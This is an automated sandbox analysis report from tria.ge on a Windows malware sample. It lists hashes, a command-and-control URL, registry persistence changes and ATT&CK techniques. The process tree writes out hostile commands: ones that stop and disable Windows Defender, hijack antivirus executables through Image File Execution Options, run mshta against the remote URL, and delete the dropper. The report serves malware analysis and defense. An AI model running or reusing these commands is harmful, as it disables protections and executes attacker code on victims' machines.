Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/09/2024, 09:23
Static task
static1
Behavioral task
behavioral1
Sample
f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
-
Size
2.5MB
-
MD5
f5b25ec260db4901e88d2793b5e34998
-
SHA1
05e5794bffc36694bb39750652fd84dc7e3146e6
-
SHA256
6edffe88fcc7936cd27cb9016ca25739aabd148e40cb44eeff8c53975f3144af
-
SHA512
5b6331493a142bbeb2c477a007c7275be20fbdc9af3413a508e84ceb8c2c4a6e34be30ce6dfddf2dbfd6cfd187e4a67823c687923f7d36a500c5f56baba04bec
-
SSDEEP
49152:8nEdi2AHYTFxTal3sQ7VoqvZgpIgpilI3gXWs0SoyN+Y+RC5Hwen/aGLYAzpkbyh:z44pxTal3sQ5raXS1c2Fv/ZLYAzpXh
Malware Config
Extracted
http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=UXMRPRRI&2=i-s&3=176&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\dysfrs.exe" dysfrs.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" dysfrs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" dysfrs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" dysfrs.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 1300 dysfrs.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4276 sc.exe 2444 sc.exe 2928 sc.exe 4980 sc.exe 3476 sc.exe 1140 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dysfrs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1300 dysfrs.exe Token: SeShutdownPrivilege 1300 dysfrs.exe Token: SeDebugPrivilege 1300 dysfrs.exe Token: SeShutdownPrivilege 1300 dysfrs.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe 1300 dysfrs.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1300 dysfrs.exe 1300 dysfrs.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 924 wrote to memory of 4276 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 82 PID 924 wrote to memory of 4276 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 82 PID 924 wrote to memory of 4276 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 82 PID 924 wrote to memory of 2444 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 83 PID 924 wrote to memory of 2444 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 83 PID 924 wrote to memory of 2444 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 83 PID 924 wrote to memory of 5028 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 84 PID 924 wrote to memory of 5028 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 84 PID 924 wrote to memory of 5028 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 84 PID 924 wrote to memory of 2928 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 86 PID 924 wrote to memory of 2928 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 86 PID 924 wrote to memory of 2928 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 86 PID 5028 wrote to memory of 4112 5028 net.exe 91 PID 5028 wrote to memory of 4112 5028 net.exe 91 PID 5028 wrote to memory of 4112 5028 net.exe 91 PID 924 wrote to memory of 1300 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 90 PID 924 wrote to memory of 1300 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 90 PID 924 wrote to memory of 1300 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 90 PID 924 wrote to memory of 5008 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 92 PID 924 wrote to memory of 5008 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 92 PID 924 wrote to memory of 5008 924 f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe 92 PID 1300 wrote to memory of 4980 1300 dysfrs.exe 94 PID 1300 wrote to memory of 4980 1300 dysfrs.exe 94 PID 1300 wrote to memory of 4980 1300 dysfrs.exe 94 PID 1300 wrote to memory of 1140 1300 dysfrs.exe 95 PID 1300 wrote to memory of 1140 1300 dysfrs.exe 95 PID 1300 wrote to memory of 1140 1300 dysfrs.exe 95 PID 1300 wrote to memory of 5032 1300 dysfrs.exe 96 PID 1300 wrote to memory of 5032 1300 dysfrs.exe 96 PID 1300 wrote to memory of 5032 1300 dysfrs.exe 96 PID 1300 wrote to memory of 3476 1300 dysfrs.exe 97 PID 1300 wrote to memory of 3476 1300 dysfrs.exe 97 PID 1300 wrote to memory of 3476 1300 dysfrs.exe 97 PID 5032 wrote to memory of 1416 5032 net.exe 102 PID 5032 wrote to memory of 1416 5032 net.exe 102 PID 5032 wrote to memory of 1416 5032 net.exe 102 PID 1300 wrote to memory of 3232 1300 dysfrs.exe 103 PID 1300 wrote to memory of 3232 1300 dysfrs.exe 103 PID 1300 wrote to memory of 3232 1300 dysfrs.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2444
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:4112
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2928
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\dysfrs.exeC:\Users\Admin\AppData\Roaming\Microsoft\dysfrs.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4980
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1140
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:1416
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3476
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=UXMRPRRI&2=i-s&3=176&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- System Location Discovery: System Language Discovery
PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\F5B25E~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:5008
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5f5b25ec260db4901e88d2793b5e34998
SHA105e5794bffc36694bb39750652fd84dc7e3146e6
SHA2566edffe88fcc7936cd27cb9016ca25739aabd148e40cb44eeff8c53975f3144af
SHA5125b6331493a142bbeb2c477a007c7275be20fbdc9af3413a508e84ceb8c2c4a6e34be30ce6dfddf2dbfd6cfd187e4a67823c687923f7d36a500c5f56baba04bec